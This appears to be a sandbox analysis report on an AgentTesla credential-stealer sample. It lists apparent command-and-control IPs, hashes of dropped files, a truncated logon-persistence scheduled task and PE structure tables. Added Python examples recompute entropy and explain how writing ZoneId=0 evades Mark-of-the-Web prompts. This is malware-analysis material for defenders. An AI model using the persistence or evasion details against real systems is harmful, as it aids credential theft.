| MV SUN OCEAN BUNKER INV.doc | malicious | AgentTesla | 208.91.199.224
| ReInquiry Lenght Error.exe | malicious | AgentTesla | 208.91.199.223
| ES502900012.pdf.exe | malicious | AgentTesla | 208.91.199.224
| April 2024 order Pdf.exe | malicious | AgentTesla | 208.91.198.143
| TT Invoice copy.exe | malicious | AgentTesla, PureLog Stealer | 208.91.198.143
| MT103.exe | malicious | AgentTesla, PureLog Stealer | 208.91.198.143
| SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exe | malicious | AgentTesla | 208.91.199.224
| Transmiison Remit.exe | malicious | AgentTesla | 208.91.199.224

No context
No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5: 97AD91F1C1F572C945DA12233082171D
SHA1: D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256: 3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512: 8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

Process: C:\Users\user\AppData\Roaming\TuZRpLi.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5: 97AD91F1C1F572C945DA12233082171D
SHA1: D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256: 3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512: 8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 2232
Entropy (8bit): 5.380046556058007
Encrypted: false
SSDEEP: 48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//Z+Uyus:tLHxv2IfLZ2KRH6OugIs
MD5: C80AC96165DD515A357403AA6D328CF5
SHA1: 56FE53F489E253A986A00ED2BFE3717E2E412556
SHA-256: 7EA260474B8CDB1C28681D53257667C27A4F71734C56D90171E026E13DDD046E
SHA-512: 0BFC11C77E834B5639337E10CA0A67865955151BC09C24C86F0501DCC470AA6F7656E5DBEA880B187C66F62FA28397E7AD268B9454138CBD847C44379F82298D
Malicious: false
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1580
                                            Entropy (8bit):5.100200963766607
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                            MD5:5D8F3EF7A0B480456E6E685130DA710F
                                            SHA1:F6F8DC77A2F4E04AA747198C447FD5ABAEE4626A
                                            SHA-256:5239272B334BCA0D8F3FE4A4F01604DDABD179BBF584F5B0B895328E014B709A
                                            SHA-512:9F0EC0CCFAA008FEB119D30E2E7FB72EAA4BC763BCFB0B12892905FCE335DD491D009530FBA81095CA2A4B552BA9E4487C58B940BB412D8487216DE4E9BB37E2
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1580
                                            Entropy (8bit):5.100200963766607
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                            MD5:5D8F3EF7A0B480456E6E685130DA710F
                                            SHA1:F6F8DC77A2F4E04AA747198C447FD5ABAEE4626A
                                            SHA-256:5239272B334BCA0D8F3FE4A4F01604DDABD179BBF584F5B0B895328E014B709A
                                            SHA-512:9F0EC0CCFAA008FEB119D30E2E7FB72EAA4BC763BCFB0B12892905FCE335DD491D009530FBA81095CA2A4B552BA9E4487C58B940BB412D8487216DE4E9BB37E2
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):702976
                                            Entropy (8bit):7.914385268556918
                                            Encrypted:false
                                            SSDEEP:12288:FrMrr9rr3owmyqJgA1XzGDWUPh//2dJaDiY4TynUF1wzn68c0BBQXd6Zu3q:MoZwANziVR2dJaDiFTz6vB2XdWu3q
                                            MD5:78F627ADD2CCDD0F16400418E5F829B8
                                            SHA1:013AAC15AD0A20AF80EB1F86CDF27E6159C7AC9B
                                            SHA-256:7ABD4B1C93D30C7AB8F817EBCF83262950131614590C9B254F05449EC493818C
                                            SHA-512:7A867A55AD53C928607D0235E2EAB1C47769A948EF1FB3EB13C21A22EDE80003D364FE1675E041DDB4F86EA0BBB614092F503FBC25A43FD16DA5C5F1E18457A3
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 18%
                                            • Antivirus: Virustotal, Detection: 30%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........;...............................................................0..A....... .........%.Q...(.....R... .........%.m...(.....n...(3...*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(P...+....s....}......j}....*..0............{......*...0..Q..........E.... ...........+... .............{.....(h.......,...+..+...
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0
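Two of the dropped files above are small enough that their full content is visible in the Preview field, which makes them a convenient check on the "Entropy (8bit)" figures in this report. The following is an added example, not Joe Sandbox code: it recomputes the 8-bit Shannon entropy for the PowerShell AppLocker probe and for the Zone.Identifier stream, and decodes the latter. Both byte strings are reconstructed from the Preview and Size fields (the probe is 60 bytes with no line terminator, so its text carries a trailing space; the Zone.Identifier preview shows four non-printable bytes between the header and the ZoneId line). The URLZONE mapping is Windows' standard one, not something the report states.

```python
"""Recompute the report's entropy values for two tiny dropped files and
decode the Zone.Identifier alternate data stream.  Added example; the file
contents below are reconstructed from the report's Preview/Size fields."""
import math
from collections import Counter

# Reconstructed from the report.  Sizes: 60 bytes (ASCII, no line terminator,
# hence the trailing space) and 26 bytes (four non-printables shown as '....').
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Standard URLZONE values stored in the ZoneId key.  The Attachment Manager
# only raises the "file came from another computer" prompt for zones 3 and 4,
# so a dropper that writes ZoneId=0 to its own copy avoids Mark-of-the-Web.
URL_ZONES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
             3: "Internet", 4: "Restricted Sites"}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: the 'Entropy (8bit)' figure used throughout the report."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def matches_report(data: bytes, reported: float, tolerance: float = 1e-9) -> bool:
    """True when our recomputed entropy agrees with the value printed in the report."""
    return math.isclose(shannon_entropy(data), reported, rel_tol=0.0, abs_tol=tolerance)


def parse_zone_identifier(stream: bytes) -> dict:
    """Parse the INI-style Zone.Identifier ADS into a dict with the zone decoded."""
    result = {}
    section = None
    for raw in stream.decode("ascii", "replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            result[key.strip()] = value.strip()
    if "ZoneId" in result:
        zone_id = int(result["ZoneId"])
        result["ZoneId"] = zone_id
        result["zone"] = URL_ZONES.get(zone_id, "unknown")
        # Prompt/SmartScreen handling is only triggered for Internet and Restricted.
        result["motw_prompt"] = zone_id >= 3
    return result


if __name__ == "__main__":
    print(f"{shannon_entropy(APPLOCKER_PROBE):.15f}")  # report: 4.038920595031593
    print(f"{shannon_entropy(ZONE_IDENTIFIER):.14f}")  # report: 3.95006375643621
    print(parse_zone_identifier(ZONE_IDENTIFIER))
```

Plain-text files such as these sit around 4 bits per byte; the same function applied to the bytes of the sample's .text section would give the 7.92 reported further down, which is close to the 8.0 ceiling and is the usual sign of compressed or encrypted content embedded in the assembly.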
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.914385268556918
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            File size:702'976 bytes
                                            MD5:78f627add2ccdd0f16400418e5f829b8
                                            SHA1:013aac15ad0a20af80eb1f86cdf27e6159c7ac9b
                                            SHA256:7abd4b1c93d30c7ab8f817ebcf83262950131614590c9b254f05449ec493818c
                                            SHA512:7a867a55ad53c928607d0235e2eab1c47769a948ef1fb3eb13c21a22ede80003d364fe1675e041ddb4f86ea0bbb614092f503fbc25a43fd16da5c5f1e18457a3
                                            SSDEEP:12288:FrMrr9rr3owmyqJgA1XzGDWUPh//2dJaDiY4TynUF1wzn68c0BBQXd6Zu3q:MoZwANziVR2dJaDiFTz6vB2XdWu3q
                                            TLSH:56E41308E6BC1A01D19E8B79E45225540376D586D053FF1F7CA45CFA0F2BBC886A4DEB
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................
                                            Icon Hash:9931c5b98687b385
                                            Entrypoint:0x4abe0e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x661F11E1 [Wed Apr 17 00:03:45 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times in the original listing: the bytes following the 6-byte entry stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xabdb8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x1600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa9e14 | 0xaa000 | f1356e1b079b89e15d8d815975dbb55a | False | 0.942721737132353 | data | 7.924266151976974 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xac000 | 0x1600 | 0x1600 | bf55757ae04241652371a2891022f3cc | False | 0.734375 | data | 6.524687955793061 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xae000 | 0xc | 0x200 | bfa2b73b478e64d53cf1eb23d152e7ce | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xac0c8 | 0xf5d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9125349605898805
RT_GROUP_ICON | 0xad038 | 0x14 | data | | | 1.05
RT_VERSION | 0xad05c | 0x3c0 | data | | | 0.4510416666666667
DLL | Import
mscoree.dll | _CorExeMain
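The entry point, the single disassembled instruction, the data directories, the section table and the import table above all describe one thing when read together: the entry stub is the stock native thunk every .NET executable carries, and the real program is CIL inside .text. The following is an added example, not Joe Sandbox code; it encodes the values printed in this report (Imagebase 0x400000, Entrypoint 0x4abe0e, jmp target 00402000h, the IAT and COM_DESCRIPTOR directories, the three sections) and resolves them against each other. The reading of the 7.92 .text entropy as compressed or encrypted embedded data is my inference, not a statement the report makes.

```python
"""Resolve the entry point and its jmp target against the section table and
data directories, to confirm the entry stub is the standard CLR loader thunk
(jmp [IAT slot] -> mscoree!_CorExeMain).  Added example built from the
report's printed values; not part of the sandbox output."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x4abe0e                 # report: Entrypoint
ENTRY_POINT_RVA = ENTRY_POINT_VA - IMAGE_BASE
JMP_TARGET_VA = 0x00402000                # report: "jmp dword ptr [00402000h]"


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float


# Section table as printed in the report.
SECTIONS = [
    Section(".text",  0x2000,  0xa9e14, 0xaa000, 7.924266151976974),
    Section(".rsrc",  0xac000, 0x1600,  0x1600,  6.524687955793061),
    Section(".reloc", 0xae000, 0xc,     0x200,   0.10191042566270775),
]

# Non-empty data directories as printed in the report: name -> (RVA, size).
DATA_DIRECTORIES: Dict[str, Tuple[int, int]] = {
    "IMPORT":         (0xabdb8, 0x53),
    "RESOURCE":       (0xac000, 0x1600),
    "BASERELOC":      (0xae000, 0xc),
    "IAT":            (0x2000,  0x8),
    "COM_DESCRIPTOR": (0x2008,  0x48),   # the CLR header; present only in managed images
}

# Above this, a code section is almost always carrying compressed/encrypted data
# rather than plain CIL.  Threshold is a common triage heuristic, not a standard.
HIGH_ENTROPY = 7.5


def section_for_rva(rva: int, sections=SECTIONS) -> Optional[Section]:
    """Return the section whose mapped range contains rva, or None if unmapped."""
    for s in sections:
        span = max(s.virtual_size, s.raw_size)   # loader maps the larger of the two
        if s.virtual_address <= rva < s.virtual_address + span:
            return s
    return None


def directory_for_rva(rva: int, dirs=DATA_DIRECTORIES) -> Optional[str]:
    """Return the name of the data directory covering rva, or None."""
    for name, (start, size) in dirs.items():
        if start <= rva < start + size:
            return name
    return None


def classify_entry_stub(entry_rva: int, jmp_target_va: int,
                        image_base: int = IMAGE_BASE) -> dict:
    """Collect the facts needed to recognise the managed-loader entry thunk.

    The thunk the .NET compilers emit is a single 'jmp dword ptr [slot]' where
    the slot is the one and only IAT entry (_CorExeMain from mscoree.dll); a
    32-bit IAT holding one slot plus its null terminator is exactly 8 bytes.
    """
    target_rva = jmp_target_va - image_base
    entry_section = section_for_rva(entry_rva)
    return {
        "entry_section": entry_section.name if entry_section else None,
        "entry_in_directory": directory_for_rva(entry_rva),
        "jmp_target_rva": target_rva,
        "jmp_target_directory": directory_for_rva(target_rva),
        "clr_header_present": "COM_DESCRIPTOR" in DATA_DIRECTORIES,
        "single_import_slot": DATA_DIRECTORIES.get("IAT", (0, 0))[1] == 8,
        "code_section_entropy": entry_section.entropy if entry_section else None,
    }


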